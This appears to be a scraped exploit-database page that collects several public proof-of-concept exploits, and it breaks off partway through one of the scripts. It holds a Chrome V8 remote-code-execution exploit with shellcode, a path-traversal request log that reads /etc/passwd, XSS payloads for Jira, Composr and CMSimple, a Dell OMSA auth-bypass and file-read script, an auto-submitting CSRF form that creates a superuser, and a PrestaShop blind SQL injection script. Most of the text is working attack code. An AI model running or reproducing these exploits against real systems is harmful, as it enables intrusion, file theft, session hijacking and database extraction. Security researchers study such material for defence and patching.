ISHACK AI BOT

# Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution # Exploit Author: r4j0x00 # Version: < 83.0.4103.106 # Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-6507 /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); var arraybuf = new ArrayBuffer(0x13373); var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]); var mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(mod); var shell = wasm_instance.exports.shell; var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337]; var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } array = Array(0x40000).fill(1.1); args = Array(0x100 - 1).fill(array); args.push(Array(0x40000 - 4).fill(2.2)); giant_array = Array.prototype.concat.apply([], args); giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3); length_as_double = new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0]; function trigger(array) { var x = array.length; x -= 67108861; x = Math.max(x, 0); x *= 6; x -= 5; x = Math.max(x, 0); let corrupting_array = [0.1, 0.1]; let corrupted_array = [0.1]; corrupting_array[x] = length_as_double; return [corrupting_array, corrupted_array]; } for (let i = 0; i < 30000; ++i) { trigger(giant_array); } corrupted_array = trigger(giant_array)[1]; var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]]; function searchmem(value) { skip = 0; for(i=0; i<search_space.length; ++i) { for(j=search_space[i][0];j<search_space[i][1];++j) { if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value)) { if(skip++ == 2) // Probably the first two are due to the search itself return j; } } } return -1; } function searchmem_full(value) { for(i=0;i<search_space.length;++i) { for(j=search_space[i][0];j<search_space[i][1];++j) { if((ftoi(corrupted_array[j]) === value)) { if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n)) { return j; } } } } return -1; } var arraybuf_idx = searchmem(0x13373n); if(arraybuf_idx == -1) { alert('Failed 1'); throw new Error("Not found"); } document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>"); function arb_read(addr, length) { var data = []; let u8_arraybuf = new Uint8Array(arraybuf); corrupted_array[arraybuf_idx+1] = itof(addr); for(i=0;i<length;++i) data.push(u8_arraybuf[i]); return data; } function arb_write(addr, data) { corrupted_array[arraybuf_idx+1] = itof(addr); let u8_arraybuf = new Uint8Array(arraybuf); for(i=0;i<data.length;++i) u8_arraybuf[i] = data[i]; } idx = searchmem_full((1337332n << 33n) + (1337331n << 1n)); if (idx == -1) { alert('Failed 2'); throw new Error("Not found"); } wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn; document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>"); rwx_idx = Number((wasm_addr-1n+0x68n)/8n); rwx_addr = ftoi(corrupted_array[rwx_idx-1]); if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn) { rwx_addr >>= 32n; rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n; } document.write("rwx addr: 0x"+rwx_addr.toString(16)); arb_write(rwx_addr, shellcode); shell();

# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal # Author: gosh # Date: 05-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948 # Version: 9.3.0 # Tested on: iPhone; iOS 14.4.2 GET /op=get_device_info HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "uuid": "7E07125B-61BE-4F12-820C-FA706C445219", "model": "iPhone", "sys_name": "iOS", "sys_version": "14.4.2", "battery_state": 0, "battery_level": -1, "memery_total_size": 2983772160, "device_name": "mobile", "user_name": "iPhone", "pwd": "", "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download", "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents", "dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop", "sys_type": 3 } } ------------------------------------------------------------------------------------- POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "//usr", "is_local": true, "is_hide": false, "is_floder": true, "name": "usr", "name_display": "usr", "file_size": 288, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//bin", "is_local": true, "is_hide": false, "is_floder": true, "name": "bin", "name_display": "bin", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//sbin", "is_local": true, "is_hide": false, "is_floder": true, "name": "sbin", "name_display": "sbin", "file_size": 544, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.file", "is_local": true, "is_hide": true, "is_floder": false, "name": ".file", "name_display": ".file", "file_size": 0, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//etc", "is_local": true, "is_hide": false, "is_floder": true, "name": "etc", "name_display": "etc", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//System", "is_local": true, "is_hide": false, "is_floder": true, "name": "System", "name_display": "System", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//var", "is_local": true, "is_hide": false, "is_floder": true, "name": "var", "name_display": "var", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Library", "is_local": true, "is_hide": false, "is_floder": true, "name": "Library", "name_display": "Library", "file_size": 672, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//private", "is_local": true, "is_hide": false, "is_floder": true, "name": "private", "name_display": "private", "file_size": 224, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//dev", "is_local": true, "is_hide": false, "is_floder": true, "name": "dev", "name_display": "dev", "file_size": 1395, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.ba", "is_local": true, "is_hide": true, "is_floder": true, "name": ".ba", "name_display": ".ba", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.mb", "is_local": true, "is_hide": true, "is_floder": true, "name": ".mb", "name_display": ".mb", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//tmp", "is_local": true, "is_hide": false, "is_floder": true, "name": "tmp", "name_display": "tmp", "file_size": 15, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Applications", "is_local": true, "is_hide": false, "is_floder": true, "name": "Applications", "name_display": "Applications", "file_size": 3296, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//Developer", "is_local": true, "is_hide": false, "is_floder": true, "name": "Developer", "name_display": "Developer", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//cores", "is_local": true, "is_hide": false, "is_floder": true, "name": "cores", "name_display": "cores", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }] } } ------------------------- using the data found: /var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 101 {"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT", "is_local": true, "is_hide": false, "is_floder": true, "name": "GDT", "name_display": "GDT", "file_size": 96, "create_time": 1617228.400302, "update_time": 1617228.400302, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg", "is_local": true, "is_hide": false, "is_floder": false, "name": "input_photo.jpg", "name_display": "input_photo.jpg", "file_size": 6141491, "create_time": 1617583.738397, "update_time": 1617583.738402, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico", "is_local": true, "is_hide": false, "is_floder": true, "name": "Ico", "name_display": "Ico", "file_size": 64, "create_time": 1617583.334913, "update_time": 1617583.334913, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download", "is_local": true, "is_hide": false, "is_floder": true, "name": "Download", "name_display": "Download", "file_size": 64, "create_time": 1617228.371587, "update_time": 1617228.371587, "sys_type": 3 }] } } ---------------------------------------------------------------------- GET /file=/etc/passwd HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 4 {} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/2018 Content-Length : 2018 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

# Exploit Title: Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS # Date: 07 Mar 2020 # Exploit Author: Captain_hook # Vendor Homepage: https://www.atlassian.com/ # Version: < 4.10.0 # Tested on: All OS # CVE: CVE-2020-14166 Summary: The /servicedesk/customer/portals resource in Jira Service Desk Server and Data Center before version 4.10.0 allows remote attackers with project administrator privileges to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by uploading a html file. Steps to reproduce: 1- reach to this directory http://localhost:port/servicedesk/customer/portals?customize=true 2- There's a place where the banner can be uploaded when upload wizard popup you can see that the banner image restricted to image format, you can change that type easily 3- then you can upload HTML and javascript files and hijacking cookies or XSRF tokens. Original report in bugcrowd: https://bugcrowd.com/disclosures/61a50171-aa55-4126-b9f4-4e82b4b8c301/unrestricted-file-upload-stored-xss-for-token-hijacking Original ticket in atlassian: https://jira.atlassian.com/browse/JSDSERVER-6895?error=login_required&error_description=Login+required&state=28f8e754-fb05-4f5e-adda-79e252fe2c30

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting # Date: 04/06/2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.36 # Tested on: Windows/Linux # CVE : CVE-2021-30150 Vulnerable Endpoint: https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

# Exploit Title: CMSimple 5.2 - 'External' Stored XSS # Date: 2021/04/07 # Exploit Author: Quadron Research Lab # Version: CMSimple 5.2 # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.cmsimple.org/en/ [Description] The CMSimple 5.2 allow stored XSS via the Settings > CMS > Filebrowser > "External:" input field. [Attack Vectors] The CMSimple cms "Filebrowser" "External:" input field not filter special chars. It is possible to place JavaScript code. The JavaScript code placed here is executed by clicking on the Page or Files tab. [Proof of Concept] https://github.com/Quadron-Research-Lab/CVE/blob/main/CMSimple_5.2_XSS.pdf

# Exploit Title: Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read # Date: 4/27/2020 # Exploit Author: Rhino Security Labs # Version: <= 9.4 # Description: Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. # CVE: CVE-2020-5377 # This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator # Proof of concept written by: David Yesland @daveysec with Rhino Security Labs # More information can be found here: # A patch for this issue can be found here: # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape import BaseHTTPServer import requests import thread import ssl import sys import re import os import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>' exit() #This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 #Also check out https://github.com/hantwister/FakeDellOM class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(s): data = '' content_len = int(s.headers.getheader('content-length', 0)) post_body = s.rfile.read(content_len) s.send_response(200) s.send_header("Content-type", "application/soap+xml;charset=UTF-8") s.end_headers() if "__00omacmd=getuserrightsonly" in post_body: data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>") if "__00omacmd=getaboutinfo " in post_body: data = escape("<ProductVersion>6.0.3</ProductVersion>") if data: requid = re.findall('>uuid:(.*?)<',post_body)[0] s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule"> <s:Header> <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To> <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo> <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID> </s:Header> <s:Body> <n1:SendCmd_OUTPUT> <n1:ResultCode>0</n1:ResultCode> <n1:ReturnValue>'''+data+'''</n1:ReturnValue> </n1:SendCmd_OUTPUT> </s:Body> </s:Envelope>''') else: s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''') def log_message(self, format, *args): return createdCert = False if not os.path.isfile('./server.pem'): print '[-] No server.pem certifcate file found. Generating one...' os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') createdCert = True def startServer(): server_class = BaseHTTPServer.HTTPServer httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() thread.start_new_thread(startServer,()) myIP = sys.argv[1] target = sys.argv[2] def bypassAuth(): values = {} url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} r = requests.post(url, data=data, verify=False, allow_redirects=False) cookieheader = r.headers['Set-Cookie'] sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) pathid = re.findall('Path=/(.*?);',cookieheader) values['sessionid'] = sessionid[0] values['pathid'] = pathid[0] return values ids = bypassAuth() sessionid = ids['sessionid'] pathid = ids['pathid'] print "Session: "+sessionid print "VID: "+pathid def readFile(target,sessid,pathid): while True: file = raw_input('file > ') url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) cookies = {"JSESSIONID": sessid} r = requests.get(url, cookies=cookies, verify=False) print 'Reading contents of {}:\n{}'.format(file,r.content) def getPath(path): if path.lower().startswith('c:\\'): path = path[2:] path = path.replace('\\','/') return path readFile(target,sessionid,pathid)

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF) # Date: April 8, 2021 (04/08/2021) # Exploit Author: Issac Briones # Vendor Homepage: http://www.dmasoftlab.com/ # Software Download: https://sourceforge.net/projects/radiusmanager/ # Version: 4.4.0 # CVE: CVE-2021-30147 <html> <body> < ! -- Change IP addr to IP addr that RADIUS manager is located -- > <form action="http://192.168.1.2/admin.php?cont=store_user" method="POST"> <input type="hidden" name="username" value="csrf_usr" /> <input type="hidden" name="enableuser" value="1" /> <input type="hidden" name="acctype" value="0" /> <input type="hidden" name="password1" value="csrfusr" /> <input type="hidden" name="password2" value="csrfusr" /> <input type="hidden" name="maccm" value="" /> <input type="hidden" name="mac" value="" /> <input type="hidden" name="ipmodecpe" value="0" /> <input type="hidden" name="simuse" value="1" /> <input type="hidden" name="firstname" value="" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="company" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="zip" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="taxid" value="" /> <input type="hidden" name="srvid" value="0" /> <input type="hidden" name="downlimit" value="0" /> <input type="hidden" name="uplimit" value="0" /> <input type="hidden" name="comblimit" value="0" /> <input type="hidden" name="expiration" value="2021-04-06" /> <input type="hidden" name="uptimelimit" value="00:00:00" /> <input type="hidden" name="credits" value="0.00" /> <input type="hidden" name="contractid" value="" /> <input type="hidden" name="contractvalid" value="" /> <input type="hidden" name="gpslat" value="" /> <input type="hidden" name="gpslong" value="" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="superuser" value="{SUPERUSER}" /> <input type="hidden" name="lang" value="English" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="custattr" value="" /> <input type="hidden" name="cnic" value="" /> <input type="hidden" name="cnicfile1" value="(binary)" /> <input type="hidden" name="cnicfile2" value="(binary)" /> <input type="hidden" name="adduser" value="Add user" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

# Exploit Title: PrestaShop 1.7.6.7 - 'location' Blind Sql Injection # Date: 2021-04-08 # Exploit Author: Vanshal Gaur # Vendor Homepage: https://www.prestashop.com/ # Version: 1.7.5.x < 1.7.6.8 # Tested on: Debian 10 (buster) # CVE : CVE-2020-15160 #!/usr/bin/python3 ''' Setup Vulnerable Docker on "localhost:8080": docker network create prestashop-net docker run -ti --name mysql_z --network prestashop-net -e MYSQL_ROOT_PASSWORD=admin -p 3307:3306 -d mysql:5.7 docker run -ti --name prestashop_z --network prestashop-net -e DB_SERVER=mysql_z -p 8080:80 -d prestashop/prestashop:1.7.6.7 ''' import requests import sys from lxml import html import re if len(sys.argv) != 7: print( ''' Exploit By: Vanshal Gaur Twitter Handle: @Vanshalg Exploit: CVE-2020-15160 PrestaShop blind Sql Injection 1.7.5.0 < 1.7.6.8 Before Running the script make sure to login and change "Combinations" to "Simple product" of the product and give that productid. Script will retrive the output of user() function, edit payload in script to retrive other data (Tested With Prestashop 1.7.6.7) Usage: python3 {} email password localhost 8080 productid /adminpath python3 exploit.py "[email protected]" "password" localhost 8080 11 /admin123 '''.format(sys.argv[0]) ) sys.exit(1) print("Exploiting...(Be Patient)\n") email = sys.argv[1] password = sys.argv[2] target_host = sys.argv[3] target_port = sys.argv[4] product_id = sys.argv[5] admin_path = sys.argv[6] target = "http://"+target_host+":"+target_port # proxies = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"} s = requests.Session() def login(s,target,password,email,admin_path): url = target+admin_path+"/index.php" data = {"ajax": "1", "token": '', "controller": "AdminLogin", "submitLogin": "1", "passwd": "TEMP", "email": "[email protected]"} data["passwd"] = password data["email"] = email r = s.post(url, data=data) login(s,target,password,email,admin_path) token_ext = s.get(target+admin_path+"/") token_junk = re.findall("sell/catalog/pro.*_token\=.*",token_ext.text) token_spit = re.split("\"",token_junk[0]) token_2 = re.split("\?",token_spit[0]) token = token_2[1] def productDetails_formtoken(s,target,product_id,admin_path): headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) tree = html.fromstring(q.text) output = tree.xpath("//input[contains(@name,'form[_token]')]/@value") form_token = ''.join(output) return form_token form_token = productDetails_formtoken(s,target,product_id,admin_path) def productDetails_form_location(s,target,token,product_id,admin_path): headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) tree = html.fromstring(q.text) output = tree.xpath("//input[contains(@name,'form[step3][location]')]/@value") form_location = ''.join(output) return form_location def sqli(s,token,form_token,payload,target,product_id,admin_path): for j in range(32, 126): sql_payload = payload.replace("[CHAR]", str(j)) url = target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} data = {"form[step1][name][1]": "Blind Sql Injection @Vanshalg", "form[step1][type_product]": "0", "form[step1][description_short][1]": "<p><span style=\"font-size:10pt;font-style:normal;\">Regular fit, round neckline, short sleeves. Made of extra long staple pima cotton. </span></p>\r\n<p></p>", "form[step1][description][1]": "<p><span style=\"font-size:10pt;font-style:normal;\"><span style=\"font-size:10pt;font-style:normal;\">Symbol of lightness and delicacy, the hummingbird evokes curiosity and joy.</span><span style=\"font-size:10pt;font-style:normal;\"> Studio Design' PolyFaune collection features classic products with colorful patterns, inspired by the traditional japanese origamis. To wear with a chino or jeans. The sublimation textile printing process provides an exceptional color rendering and a color, guaranteed overtime.</span></span></p>", "form[step1][features][0][feature]": "1", 